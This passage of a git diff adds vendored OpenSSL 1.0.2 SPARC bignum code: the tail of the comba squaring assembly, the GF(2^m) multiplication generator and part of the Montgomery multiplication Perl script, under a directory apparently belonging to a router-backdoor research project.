+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(5),a_5
+	mulx	a_2,a_2,t_1	!sqr_add_c(a,2,c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(4)	!r[4]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_0,a_5,t_1	!sqr_add_c2(a,5,0,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_1,a_4,t_1	!sqr_add_c2(a,4,1,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(6),a_6
+	mulx	a_2,a_3,t_1	!sqr_add_c2(a,3,2,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(5)	!r[5]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_6,a_0,t_1	!sqr_add_c2(a,6,0,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_5,a_1,t_1	!sqr_add_c2(a,5,1,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_4,a_2,t_1	!sqr_add_c2(a,4,2,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(7),a_7
+	mulx	a_3,a_3,t_1	!=!sqr_add_c(a,3,c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(6)	!r[6]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_0,a_7,t_1	!sqr_add_c2(a,7,0,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_1,a_6,t_1	!sqr_add_c2(a,6,1,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_2,a_5,t_1	!sqr_add_c2(a,5,2,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,a_4,t_1	!sqr_add_c2(a,4,3,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(7)	!r[7]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_7,a_1,t_1	!sqr_add_c2(a,7,1,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_6,a_2,t_1	!sqr_add_c2(a,6,2,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_5,a_3,t_1	!sqr_add_c2(a,5,3,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_4,a_4,t_1	!sqr_add_c(a,4,c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(8)	!r[8]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,a_7,t_1	!sqr_add_c2(a,7,2,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_3,a_6,t_1	!sqr_add_c2(a,6,3,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_4,a_5,t_1	!sqr_add_c2(a,5,4,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(9)	!r[9]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_7,a_3,t_1	!sqr_add_c2(a,7,3,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_6,a_4,t_1	!sqr_add_c2(a,6,4,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_5,a_5,t_1	!sqr_add_c(a,5,c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(10)	!r[10]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_4,a_7,t_1	!sqr_add_c2(a,7,4,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_5,a_6,t_1	!sqr_add_c2(a,6,5,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(11)	!r[11]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_7,a_5,t_1	!sqr_add_c2(a,7,5,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_6,a_6,t_1	!sqr_add_c(a,6,c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(12)	!r[12]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_6,a_7,t_1	!sqr_add_c2(a,7,6,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(13)	!r[13]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_7,a_7,t_1	!sqr_add_c(a,7,c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(14)	!r[14]=c3;
+	stuw	c_12,rp(15)	!r[15]=c1;
+
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_sqr_comba8,#function
+.size	bn_sqr_comba8,(.-bn_sqr_comba8)
+
+.align	32
+
+.global bn_sqr_comba4
+/*
+ * void bn_sqr_comba4(r,a)
+ * BN_ULONG *r,*a;
+ */
+bn_sqr_comba4:
+	save	%sp,FRAME_SIZE,%sp
+	mov	1,t_2
+	lduw	ap(0),a_0
+	sllx	t_2,32,t_2
+	lduw	ap(1),a_1
+	mulx	a_0,a_0,t_1	!sqr_add_c(a,0,c1,c2,c3);
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(0)	!r[0]=c1;
+
+	lduw	ap(2),a_2
+	mulx	a_0,a_1,t_1	!sqr_add_c2(a,1,0,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(1)	!r[1]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,a_0,t_1	!sqr_add_c2(a,2,0,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	lduw	ap(3),a_3
+	mulx	a_1,a_1,t_1	!sqr_add_c(a,1,c3,c1,c2);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(2)	!r[2]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_0,a_3,t_1	!sqr_add_c2(a,3,0,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_1,a_2,t_1	!sqr_add_c2(a,2,1,c1,c2,c3);
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(3)	!r[3]=c1;
+	or	c_12,c_3,c_12
+
+	mulx	a_3,a_1,t_1	!sqr_add_c2(a,3,1,c2,c3,c1);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,c_12
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	mulx	a_2,a_2,t_1	!sqr_add_c(a,2,c2,c3,c1);
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(4)	!r[4]=c2;
+	or	c_12,c_3,c_12
+
+	mulx	a_2,a_3,t_1	!sqr_add_c2(a,3,2,c3,c1,c2);
+	addcc	c_12,t_1,c_12
+	clr	c_3
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	addcc	c_12,t_1,t_1
+	bcs,a	%xcc,.+8
+	add	c_3,t_2,c_3
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(5)	!r[5]=c3;
+	or	c_12,c_3,c_12
+
+	mulx	a_3,a_3,t_1	!sqr_add_c(a,3,c1,c2,c3);
+	addcc	c_12,t_1,t_1
+	srlx	t_1,32,c_12
+	stuw	t_1,rp(6)	!r[6]=c1;
+	stuw	c_12,rp(7)	!r[7]=c2;
+	
+	ret
+	restore	%g0,%g0,%o0
+
+.type	bn_sqr_comba4,#function
+.size	bn_sqr_comba4,(.-bn_sqr_comba4)
+
+.align	32
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9-gf2m.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9-gf2m.pl
new file mode 100644
index 0000000..ab94cd9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9-gf2m.pl
@@ -0,0 +1,190 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# October 2012
+#
+# The module implements bn_GF2m_mul_2x2 polynomial multiplication used
+# in bn_gf2m.c. It's kind of low-hanging mechanical port from C for
+# the time being... Except that it has two code paths: one suitable
+# for all SPARCv9 processors and one for VIS3-capable ones. Former
+# delivers ~25-45% more, more for longer keys, heaviest DH and DSA
+# verify operations on venerable UltraSPARC II. On T4 VIS3 code is
+# ~100-230% faster than gcc-generated code and ~35-90% faster than
+# the pure SPARCv9 code path.
+
+$locals=16*8;
+
+$tab="%l0";
+
+@T=("%g2","%g3");
+@i=("%g4","%g5");
+
+($a1,$a2,$a4,$a8,$a12,$a48)=map("%o$_",(0..5));
+($lo,$hi,$b)=("%g1",$a8,"%o7"); $a=$lo;
+
+$code.=<<___;
+#include <sparc_arch.h>
+
+#ifdef __arch64__
+.register	%g2,#scratch
+.register	%g3,#scratch
+#endif
+
+#ifdef __PIC__
+SPARC_PIC_THUNK(%g1)
+#endif
+
+.globl	bn_GF2m_mul_2x2
+.align	16
+bn_GF2m_mul_2x2:
+        SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
+        ld	[%g1+0],%g1             	! OPENSSL_sparcv9cap_P[0]
+
+        andcc	%g1, SPARCV9_VIS3, %g0
+        bz,pn	%icc,.Lsoftware
+        nop
+
+	sllx	%o1, 32, %o1
+	sllx	%o3, 32, %o3
+	or	%o2, %o1, %o1
+	or	%o4, %o3, %o3
+	.word	0x95b262ab			! xmulx   %o1, %o3, %o2
+	.word	0x99b262cb			! xmulxhi %o1, %o3, %o4
+	srlx	%o2, 32, %o1			! 13 cycles later
+	st	%o2, [%o0+0]
+	st	%o1, [%o0+4]
+	srlx	%o4, 32, %o3
+	st	%o4, [%o0+8]
+	retl
+	st	%o3, [%o0+12]
+
+.align	16
+.Lsoftware:
+	save	%sp,-STACK_FRAME-$locals,%sp
+
+	sllx	%i1,32,$a
+	mov	-1,$a12
+	sllx	%i3,32,$b
+	or	%i2,$a,$a
+	srlx	$a12,1,$a48			! 0x7fff...
+	or	%i4,$b,$b
+	srlx	$a12,2,$a12			! 0x3fff...
+	add	%sp,STACK_BIAS+STACK_FRAME,$tab
+
+	sllx	$a,2,$a4
+	mov	$a,$a1
+	sllx	$a,1,$a2
+
+	srax	$a4,63,@i[1]			! broadcast 61st bit
+	and	$a48,$a4,$a4			! (a<<2)&0x7fff...
+	srlx	$a48,2,$a48
+	srax	$a2,63,@i[0]			! broadcast 62nd bit
+	and	$a12,$a2,$a2			! (a<<1)&0x3fff...
+	srax	$a1,63,$lo			! broadcast 63rd bit
+	and	$a48,$a1,$a1			! (a<<0)&0x1fff...
+
+	sllx	$a1,3,$a8
+	and	$b,$lo,$lo
+	and	$b,@i[0],@i[0]
+	and	$b,@i[1],@i[1]
+
+	stx	%g0,[$tab+0*8]			! tab[0]=0
+	xor	$a1,$a2,$a12
+	stx	$a1,[$tab+1*8]			! tab[1]=a1
+	stx	$a2,[$tab+2*8]			! tab[2]=a2
+	 xor	$a4,$a8,$a48
+	stx	$a12,[$tab+3*8]			! tab[3]=a1^a2
+	 xor	$a4,$a1,$a1
+
+	stx	$a4,[$tab+4*8]			! tab[4]=a4
+	xor	$a4,$a2,$a2
+	stx	$a1,[$tab+5*8]			! tab[5]=a1^a4
+	xor	$a4,$a12,$a12
+	stx	$a2,[$tab+6*8]			! tab[6]=a2^a4
+	 xor	$a48,$a1,$a1
+	stx	$a12,[$tab+7*8]			! tab[7]=a1^a2^a4
+	 xor	$a48,$a2,$a2
+
+	stx	$a8,[$tab+8*8]			! tab[8]=a8
+	xor	$a48,$a12,$a12
+	stx	$a1,[$tab+9*8]			! tab[9]=a1^a8
+	 xor	$a4,$a1,$a1
+	stx	$a2,[$tab+10*8]			! tab[10]=a2^a8
+	 xor	$a4,$a2,$a2
+	stx	$a12,[$tab+11*8]		! tab[11]=a1^a2^a8
+
+	xor	$a4,$a12,$a12
+	stx	$a48,[$tab+12*8]		! tab[12]=a4^a8
+	 srlx	$lo,1,$hi
+	stx	$a1,[$tab+13*8]			! tab[13]=a1^a4^a8
+	 sllx	$lo,63,$lo
+	stx	$a2,[$tab+14*8]			! tab[14]=a2^a4^a8
+	 srlx	@i[0],2,@T[0]
+	stx	$a12,[$tab+15*8]		! tab[15]=a1^a2^a4^a8
+
+	sllx	@i[0],62,$a1
+	 sllx	$b,3,@i[0]
+	srlx	@i[1],3,@T[1]
+	 and	@i[0],`0xf<<3`,@i[0]
+	sllx	@i[1],61,$a2
+	 ldx	[$tab+@i[0]],@i[0]
+	 srlx	$b,4-3,@i[1]
+	xor	@T[0],$hi,$hi
+	 and	@i[1],`0xf<<3`,@i[1]
+	xor	$a1,$lo,$lo
+	 ldx	[$tab+@i[1]],@i[1]
+	xor	@T[1],$hi,$hi
+
+	xor	@i[0],$lo,$lo
+	srlx	$b,8-3,@i[0]
+	 xor	$a2,$lo,$lo
+	and	@i[0],`0xf<<3`,@i[0]
+___
+for($n=1;$n<14;$n++) {
+$code.=<<___;
+	sllx	@i[1],`$n*4`,@T[0]
+	ldx	[$tab+@i[0]],@i[0]
+	srlx	@i[1],`64-$n*4`,@T[1]
+	xor	@T[0],$lo,$lo
+	srlx	$b,`($n+2)*4`-3,@i[1]
+	xor	@T[1],$hi,$hi
+	and	@i[1],`0xf<<3`,@i[1]
+___
+	push(@i,shift(@i)); push(@T,shift(@T));
+}
+$code.=<<___;
+	sllx	@i[1],`$n*4`,@T[0]
+	ldx	[$tab+@i[0]],@i[0]
+	srlx	@i[1],`64-$n*4`,@T[1]
+	xor	@T[0],$lo,$lo
+
+	sllx	@i[0],`($n+1)*4`,@T[0]
+	 xor	@T[1],$hi,$hi
+	srlx	@i[0],`64-($n+1)*4`,@T[1]
+	xor	@T[0],$lo,$lo
+	xor	@T[1],$hi,$hi
+
+	srlx	$lo,32,%i1
+	st	$lo,[%i0+0]
+	st	%i1,[%i0+4]
+	srlx	$hi,32,%i2
+	st	$hi,[%i0+8]
+	st	%i2,[%i0+12]
+
+	ret
+	restore
+.type	bn_GF2m_mul_2x2,#function
+.size	bn_GF2m_mul_2x2,.-bn_GF2m_mul_2x2
+.asciz	"GF(2^m) Multiplication for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9-mont.pl
new file mode 100644
index 0000000..b8fb1e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/sparcv9-mont.pl
@@ -0,0 +1,606 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# December 2005
+#
+# Pure SPARCv9/8+ and IALU-only bn_mul_mont implementation. The reasons
+# for undertaken effort are multiple. First of all, UltraSPARC is not
+# the whole SPARCv9 universe and other VIS-free implementations deserve
+# optimized code as much. Secondly, newly introduced UltraSPARC T1,
+# a.k.a. Niagara, has shared FPU and concurrent FPU-intensive pathes,
+# such as sparcv9a-mont, will simply sink it. Yes, T1 is equipped with
+# several integrated RSA/DSA accelerator circuits accessible through
+# kernel driver [only(*)], but having decent user-land software
+# implementation is important too. Finally, reasons like desire to
+# experiment with dedicated squaring procedure. Yes, this module
+# implements one, because it was easiest to draft it in SPARCv9
+# instructions...
+
+# (*)	Engine accessing the driver in question is on my TODO list.
+#	For reference, acceleator is estimated to give 6 to 10 times
+#	improvement on single-threaded RSA sign. It should be noted
+#	that 6-10x improvement coefficient does not actually mean
+#	something extraordinary in terms of absolute [single-threaded]
+#	performance, as SPARCv9 instruction set is by all means least
+#	suitable for high performance crypto among other 64 bit
+#	platforms. 6-10x factor simply places T1 in same performance
+#	domain as say AMD64 and IA-64. Improvement of RSA verify don't
+#	appear impressive at all, but it's the sign operation which is
+#	far more critical/interesting.
+
+# You might notice that inner loops are modulo-scheduled:-) This has
+# essentially negligible impact on UltraSPARC performance, it's
+# Fujitsu SPARC64 V users who should notice and hopefully appreciate
+# the advantage... Currently this module surpasses sparcv9a-mont.pl
+# by ~20% on UltraSPARC-III and later cores, but recall that sparcv9a
+# module still have hidden potential [see TODO list there], which is
+# estimated to be larger than 20%...
+
+# int bn_mul_mont(
+$rp="%i0";	# BN_ULONG *rp,
+$ap="%i1";	# const BN_ULONG *ap,
+$bp="%i2";	# const BN_ULONG *bp,
+$np="%i3";	# const BN_ULONG *np,
+$n0="%i4";	# const BN_ULONG *n0,
+$num="%i5";	# int num);
+
+$bits=32;
+for (@ARGV)	{ $bits=64 if (/\-m64/ || /\-xarch\=v9/); }
+if ($bits==64)	{ $bias=2047; $frame=192; }
+else		{ $bias=0;    $frame=128; }
+
+$car0="%o0";
+$car1="%o1";
+$car2="%o2";	# 1 bit
+$acc0="%o3";
+$acc1="%o4";
+$mask="%g1";	# 32 bits, what a waste...
+$tmp0="%g4";
+$tmp1="%g5";
+
+$i="%l0";
+$j="%l1";
+$mul0="%l2";
+$mul1="%l3";
+$tp="%l4";
+$apj="%l5";
+$npj="%l6";
+$tpj="%l7";
+
+$fname="bn_mul_mont_int";
+
+$code=<<___;
+.section	".text",#alloc,#execinstr
+
+.global	$fname
+.align	32
+$fname:
+	cmp	%o5,4			! 128 bits minimum
+	bge,pt	%icc,.Lenter
+	sethi	%hi(0xffffffff),$mask
+	retl
+	clr	%o0
+.align	32
+.Lenter:
+	save	%sp,-$frame,%sp
+	sll	$num,2,$num		! num*=4
+	or	$mask,%lo(0xffffffff),$mask
+	ld	[$n0],$n0
+	cmp	$ap,$bp
+	and	$num,$mask,$num
+	ld	[$bp],$mul0		! bp[0]
+	nop
+
+	add	%sp,$bias,%o7		! real top of stack
+	ld	[$ap],$car0		! ap[0] ! redundant in squaring context
+	sub	%o7,$num,%o7
+	ld	[$ap+4],$apj		! ap[1]
+	and	%o7,-1024,%o7
+	ld	[$np],$car1		! np[0]
+	sub	%o7,$bias,%sp		! alloca
+	ld	[$np+4],$npj		! np[1]
+	be,pt	`$bits==32?"%icc":"%xcc"`,.Lbn_sqr_mont
+	mov	12,$j
+
+	mulx	$car0,$mul0,$car0	! ap[0]*bp[0]
+	mulx	$apj,$mul0,$tmp0	!prologue! ap[1]*bp[0]
+	and	$car0,$mask,$acc0
+	add	%sp,$bias+$frame,$tp
+	ld	[$ap+8],$apj		!prologue!
+
+	mulx	$n0,$acc0,$mul1		! "t[0]"*n0
+	and	$mul1,$mask,$mul1
+
+	mulx	$car1,$mul1,$car1	! np[0]*"t[0]"*n0
+	mulx	$npj,$mul1,$acc1	!prologue! np[1]*"t[0]"*n0
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	ld	[$np+8],$npj		!prologue!
+	srlx	$car1,32,$car1
+	mov	$tmp0,$acc0		!prologue!
+
+.L1st:
+	mulx	$apj,$mul0,$tmp0
+	mulx	$npj,$mul1,$tmp1
+	add	$acc0,$car0,$car0
+	ld	[$ap+$j],$apj		! ap[j]
+	and	$car0,$mask,$acc0
+	add	$acc1,$car1,$car1
+	ld	[$np+$j],$npj		! np[j]
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	add	$j,4,$j			! j++
+	mov	$tmp0,$acc0
+	st	$car1,[$tp]
+	cmp	$j,$num
+	mov	$tmp1,$acc1
+	srlx	$car1,32,$car1
+	bl	%icc,.L1st
+	add	$tp,4,$tp		! tp++
+!.L1st
+
+	mulx	$apj,$mul0,$tmp0	!epilogue!
+	mulx	$npj,$mul1,$tmp1
+	add	$acc0,$car0,$car0
+	and	$car0,$mask,$acc0
+	add	$acc1,$car1,$car1
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp]
+	srlx	$car1,32,$car1
+
+	add	$tmp0,$car0,$car0
+	and	$car0,$mask,$acc0
+	add	$tmp1,$car1,$car1
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp+4]
+	srlx	$car1,32,$car1
+
+	add	$car0,$car1,$car1
+	st	$car1,[$tp+8]
+	srlx	$car1,32,$car2
+
+	mov	4,$i			! i++
+	ld	[$bp+4],$mul0		! bp[1]
+.Louter:
+	add	%sp,$bias+$frame,$tp
+	ld	[$ap],$car0		! ap[0]
+	ld	[$ap+4],$apj		! ap[1]
+	ld	[$np],$car1		! np[0]
+	ld	[$np+4],$npj		! np[1]
+	ld	[$tp],$tmp1		! tp[0]
+	ld	[$tp+4],$tpj		! tp[1]
+	mov	12,$j
+
+	mulx	$car0,$mul0,$car0
+	mulx	$apj,$mul0,$tmp0	!prologue!
+	add	$tmp1,$car0,$car0
+	ld	[$ap+8],$apj		!prologue!
+	and	$car0,$mask,$acc0
+
+	mulx	$n0,$acc0,$mul1
+	and	$mul1,$mask,$mul1
+
+	mulx	$car1,$mul1,$car1
+	mulx	$npj,$mul1,$acc1	!prologue!
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	ld	[$np+8],$npj		!prologue!
+	srlx	$car1,32,$car1
+	mov	$tmp0,$acc0		!prologue!
+
+.Linner:
+	mulx	$apj,$mul0,$tmp0
+	mulx	$npj,$mul1,$tmp1
+	add	$tpj,$car0,$car0
+	ld	[$ap+$j],$apj		! ap[j]
+	add	$acc0,$car0,$car0
+	add	$acc1,$car1,$car1
+	ld	[$np+$j],$npj		! np[j]
+	and	$car0,$mask,$acc0
+	ld	[$tp+8],$tpj		! tp[j]
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	add	$j,4,$j			! j++
+	mov	$tmp0,$acc0
+	st	$car1,[$tp]		! tp[j-1]
+	srlx	$car1,32,$car1
+	mov	$tmp1,$acc1
+	cmp	$j,$num
+	bl	%icc,.Linner
+	add	$tp,4,$tp		! tp++
+!.Linner
+
+	mulx	$apj,$mul0,$tmp0	!epilogue!
+	mulx	$npj,$mul1,$tmp1
+	add	$tpj,$car0,$car0
+	add	$acc0,$car0,$car0
+	ld	[$tp+8],$tpj		! tp[j]
+	and	$car0,$mask,$acc0
+	add	$acc1,$car1,$car1
+	srlx	$car0,32,$car0
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp]		! tp[j-1]
+	srlx	$car1,32,$car1
+
+	add	$tpj,$car0,$car0
+	add	$tmp0,$car0,$car0
+	and	$car0,$mask,$acc0
+	add	$tmp1,$car1,$car1
+	add	$acc0,$car1,$car1
+	st	$car1,[$tp+4]		! tp[j-1]
+	srlx	$car0,32,$car0
+	add	$i,4,$i			! i++
+	srlx	$car1,32,$car1
+
+	add	$car0,$car1,$car1
+	cmp	$i,$num
+	add	$car2,$car1,$car1
+	st	$car1,[$tp+8]
+
+	srlx	$car1,32,$car2
+	bl,a	%icc,.Louter
+	ld	[$bp+$i],$mul0		! bp[i]
+!.Louter
+
+	add	$tp,12,$tp
+
+.Ltail:
+	add	$np,$num,$np
+	add	$rp,$num,$rp
+	mov	$tp,$ap
+	sub	%g0,$num,%o7		! k=-num
+	ba	.Lsub
+	subcc	%g0,%g0,%g0		! clear %icc.c
+.align	16
+.Lsub:
+	ld	[$tp+%o7],%o0
+	ld	[$np+%o7],%o1
+	subccc	%o0,%o1,%o1		! tp[j]-np[j]
+	add	$rp,%o7,$i
+	add	%o7,4,%o7
+	brnz	%o7,.Lsub
+	st	%o1,[$i]
+	subc	$car2,0,$car2		! handle upmost overflow bit
+	and	$tp,$car2,$ap
+	andn	$rp,$car2,$np
+	or	$ap,$np,$ap
+	sub	%g0,$num,%o7
+
+.Lcopy:
+	ld	[$ap+%o7],%o0		! copy or in-place refresh
